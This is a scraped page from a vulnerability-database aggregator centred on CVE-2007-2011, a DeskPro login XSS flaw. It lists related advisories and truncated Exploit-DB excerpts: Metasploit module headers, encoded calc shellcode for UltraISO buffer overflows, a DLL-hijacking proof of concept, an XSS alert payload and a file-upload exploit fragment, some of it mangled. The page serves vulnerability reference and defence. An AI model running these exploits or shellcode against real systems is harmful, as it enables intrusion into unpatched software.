CVE-2007-2011
published 2007-04-12CVE-2007-2011: Cross-site scripting (XSS) vulnerability in login.php in DeskPro 2.0.1 allows remote attackers to inject arbitrary web script or HTML via the username…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.87%
76.7th percentile
Cross-site scripting (XSS) vulnerability in login.php in DeskPro 2.0.1 allows remote attackers to inject arbitrary web script or HTML via the username parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deskpro | deskpro | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-72wq-j3f9-x5wf: Cross-site scripting (XSS) vulnerability in login
ghsa_unreviewed·2022-05-01
CVE-2007-2011 [MEDIUM] GHSA-72wq-j3f9-x5wf: Cross-site scripting (XSS) vulnerability in login
Cross-site scripting (XSS) vulnerability in login.php in DeskPro 2.0.1 allows remote attackers to inject arbitrary web script or HTML via the username parameter.
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
Red Hat
httpd: multiple ranges DoS
vendor_redhat·2011-08-20·CVSS 7.8
CVE-2011-3192 [HIGH] httpd: multiple ranges DoS
httpd: multiple ranges DoS
The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
Statement: Before updated packages are deployed, users can deploy configuration changes to mitigate this flaw:
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-3192#c18
Package: httpd (Red Hat Directory Server 8) - Affected
Red Hat
php-pear: symlink vulnerability in PEAR installer
vendor_redhat·2010-11-14·CVSS 6.8
CVE-2011-1072 [MEDIUM] php-pear: symlink vulnerability in PEAR installer
php-pear: symlink vulnerability in PEAR installer
The installer in PEAR before 1.9.2 allows local users to overwrite arbitrary files via a symlink attack on the package.xml file, related to the (1) download_dir, (2) cache_dir, (3) tmp_dir, and (4) pear-build-download directories, a different vulnerability than CVE-2007-2519.
Package: php-pear (Red Hat Enterprise Linux 5) - Not affected
Red Hat
glibc: fnmatch() alloca()-based memory corruption flaw
vendor_redhat·2010-08-05·CVSS 5.0
CVE-2011-1071 [MEDIUM] glibc: fnmatch() alloca()-based memory corruption flaw
glibc: fnmatch() alloca()-based memory corruption flaw
The GNU C Library (aka glibc or libc6) before 2.12.2 and Embedded GLIBC (EGLIBC) allow context-dependent attackers to execute arbitrary code or cause a denial of service (memory consumption) via a long UTF8 string that is used in an fnmatch call, aka a "stack extension attack," a related issue to CVE-2010-2898, CVE-2010-1917, and CVE-2007-4782, as originally reported for use of this library by Google Chrome.
Red Hat
sysstat insecure temporary file usage
vendor_redhat·2007-08-10·CVSS 4.4
CVE-2007-3852 [MEDIUM] CWE-377 sysstat insecure temporary file usage
sysstat insecure temporary file usage
The init script (sysstat.in) in sysstat 5.1.2 up to 7.1.6 creates /tmp/sysstat.run insecurely, which allows local users to execute arbitrary code.
Statement: This issue did not affect the versions of sysstat as shipped with Red Hat Enterprise Linux 4. This issue has been addressed in Red Hat Enterprise Linux 5 via RHSA-2011:1005 advisory.
No detection rules found.
Exploit-DB
Oracle - xdb.xdb_pitrig_pkg.PITRIG_DROPMETADATA procedure
exploitdb·2011-11-07·CVSS 6.0
CVE-2007-4517 [MEDIUM] Oracle - xdb.xdb_pitrig_pkg.PITRIG_DROPMETADATA procedure
Oracle - xdb.xdb_pitrig_pkg.PITRIG_DROPMETADATA procedure
---
# Exploit Title: New exploit to Oracle CVE-2007-4517 vulnerability
# Date: 11,2,2011
# Author: David Maman and the GreenSQL Team
# Software Link: http://blog.greensql.com/2011/11/02/new-exploit-to-oracle-vulnerability/
# Version: 0.1
# Tested on: Oracle Database 10g Express Edition
# CVE : New exploit to CVE-2007-4517
Summary
As part of GreenSQLs Database security research, weve been validating and extending coverage of known and unknown vulnerabilities in order to increase GreenSQL product security, at this post we will reveal a full working Prove of Concept for the CVE-2007-4517 vulnerability which executes arbitrary code.
The Exploit: PL/SQL/2007-4517 exploit is a PL/SQL procedure that exploits the CVE-2007-4517 vulnerab
Exploit-DB
Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)
exploitdb·2011-11-05
CVE-2011-0105 Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)
Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)
---
##
# $Id: ms11_021_xlb_bof.rb 14172 2011-11-06 20:16:34Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Excel of Microsoft Office 2007.
By supplying a malformed .xlb file, an attacker can control the content (source)
of a memcpy routine, and the number of bytes to copy, therefore causing a stack-
based buffer overflow. This res
Exploit-DB
SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)
exploitdb·2011-09-20·CVSS 4.0
CVE-2011-1892 [MEDIUM] SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)
SharePoint 2007/2010 and DotNetNuke
]>
&boom;
poc filename: xee.xsl
Exploit-DB
DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)
exploitdb·2011-09-01
CVE-2007-3068 DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)
DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)
---
##
# $Id: dvdx_plf_bof.rb 13673 2011-09-01 05:20:47Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "DVD X Player 5.5 .plf PlayList Buffer Overflow",
'Description' => %q{
This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and
Standard. By supplying a long string of data in a plf file (playlist), the
MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,
and then copy it on the stack without any proper bounds chec
Exploit-DB
Oracle HTTP Server - Cross-Site Scripting Header Injection
exploitdb·2011-06-13·CVSS 4.3
CVE-2006-3918 [MEDIUM] Oracle HTTP Server - Cross-Site Scripting Header Injection
Oracle HTTP Server - Cross-Site Scripting Header Injection
---
Oracle HTTP Server XSS Header Injection
# Attack Pattern ID : CAPEC-86
# CWE ID : CI-79
# OWASP IDs : A1-Injections, A2-Cross Site Scripting (XSS)
# CVE ID : not yet
# Related CVEs : CVE-2006-3918, CVE-2007-0275
# A.K.A : Unfiltered Header Injection
# Product Type : Application
# Vendor : Oracle Corporation
# Product : Oracle HTTP Server for Oracle Application Server 10g
# Vulnerable Versions: 10.1.2.0.2
# Probably Vulnerable: (not tested) 10.1.2.0.0, 9.0.4.3.0, 9.0.4.2.0, 9.0.4.1.0, 9.0.4.0.0
# Severity : Medium
# Tested on : Linux, Windows Server 2003
# Download link : http://www.oracle.com/technetwork/middleware/ias/downloads/101201se-090616.html
# Date : 12/06/2011
# Google Dork : allintitle:"Oracle HTTP Server -"
[-] Cre
Exploit-DB
Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
exploitdb·2011-04-11
CVE-2011-2007 Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/49997/info
Microsoft Host Integration Server is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause the application to become unresponsive or to crash, denying service to legitimate users.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36211.zip
Exploit-DB
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
exploitdb·2011-03-04
CVE-2010-3333 Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
---
##
# $Id: ms10_087_rtf_pfragments_bof.rb 11875 2011-03-04 08:39:48Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',
'Description' => %q{
This module exploits a stack-based buffer overflow in the handling of the
'pFragments' shape property within the Microsoft Word RTF parser. All versions
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
MS10-087
Exploit-DB
Apple Mac OSX - mDNSResponder UPnP Location Overflow (Metasploit)
exploitdb·2011-01-08
CVE-2007-2386 Apple Mac OSX - mDNSResponder UPnP Location Overflow (Metasploit)
Apple Mac OSX - mDNSResponder UPnP Location Overflow (Metasploit)
---
##
# $Id: upnp_location.rb 11515 2011-01-08 01:12:15Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mac OS X mDNSResponder UPnP Location Overflow',
'Description' => %q{
This module exploits a buffer overflow that occurs when processing
specially crafted requests set to mDNSResponder. All Mac OS X systems
between version 10.4 and 10.4.9 (without the 2007-005 patch) are
affected.
},
'License' => MSF_LICENSE,
'Author' =>
[
'ddz'
],
'Version' => '$Revision: 11515 $'
Exploit-DB
Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking
exploitdb·2010-08-25
CVE-2011-0108 Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking
Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking
---
/*
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles , Dinesh Arora, Anirban ,Ganesha, Dinesh Arora
# Site : www.beenuarora.com
Exploit Title: Microsoft Office Groove 2007 DLL Hijacking
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3 , Microsoft Office Groove 2007
Vulnerable extensions: wab , p7c
Compile and rename to mso.dll.dll, create a file in the same dir with one of the following extensions:
.vcg , .gta
*/
#include
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void hook_startup() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14746.zip
Exploit-DB
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)
exploitdb·2007-05-28
CVE-2007-2888 UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)
---
/*
Date : May 28th 2007.
UltraISO executes calc.Don't
forget you need to have the bin and cue file in the same
Directory special thanks to Thomas Pollet also.
*/
#include
#include
//Calc shell_code
unsigned char shell_code[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\
Exploit-DB
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2)
exploitdb·2007-05-28
CVE-2007-2888 UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2)
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2)
---
#
#ultra iso exploit
#thomas . pollet @ gmail . com
#
import struct
scode=(#metasploit calc.exe shellcode
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x
Exploit-DB
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC)
exploitdb·2007-05-24
CVE-2007-2888 UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC)
UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC)
---
#!/usr/bin/perl
############################################################
#Credit:To n00b for finding this bug and writing poc.
############################################################
#Ultra ISO stack over flow poc code.
#Ultra iso is exploitable via opening
#a specially crafted Cue file..There is
#A limitation that the user must have the bin
#file in the same dir as the cue file.
#This is the reason i have provided the
#Bin file also Command execution is possible
#As we can control $ebp and $eip hoooooha.
#I will be working on the local exploit
#as soon as i get a chance this should be a straight forward
#to exploit this as we already gain control of the
#$eip register..
#Tested on :win xp service pack 2
#Vendor'
Exploit-DB
DeskPro 2.0.1 - 'login.php' HTML Injection
exploitdb·2007-04-09
CVE-2007-2011 DeskPro 2.0.1 - 'login.php' HTML Injection
DeskPro 2.0.1 - 'login.php' HTML Injection
---
source: https://www.securityfocus.com/bid/23381/info
DeskPRO is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
DeskPRO 2.0.1 is vulnerable to this issue.
DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability
DeskPRO v2.0.1 - Cross-Site Scripting Vulnerabilitydiscovered by John
Martinelli
alert(1);">
Exploit-DB
W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities
exploitdb·2007-03-20
CVE-2007-1604 W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities
W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities
---
source: https://www.securityfocus.com/bid/23055/info
w-Agora is prone to multiple arbitrary file-upload vulnerabilities.
An attacker can exploit these vulnerabilities to upload PHP script code and execute it in the context of the webserver process.
w-Agora 4.2.1 is vulnerable.
-----------------------------76401208715012
Content-Disposition: form-data; name="submit"
Copy file
-----------------------------76401208715012--
]
Response Headers:
Date[Mon, 30 May 2011 00:58:18 GMT]
Server[Apache/2.2.11 (Win32) PHP/5.3.0]
X-Powered-By[PHP/5.3.0]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]
*/
if(count($argv) == 5)
{
echo "\n\n";
echo "+--------------------------
No writeups or analysis indexed.
http://john-martinelli.com/work/deskpro.txthttp://osvdb.org/34721http://secunia.com/advisories/24844http://securityreason.com/securityalert/2556http://www.securityfocus.com/archive/1/465089/100/0/threadedhttp://www.securityfocus.com/bid/23381http://www.vupen.com/english/advisories/2007/1320http://john-martinelli.com/work/deskpro.txthttp://osvdb.org/34721http://secunia.com/advisories/24844http://securityreason.com/securityalert/2556http://www.securityfocus.com/archive/1/465089/100/0/threadedhttp://www.securityfocus.com/bid/23381http://www.vupen.com/english/advisories/2007/1320
2007-04-12
Published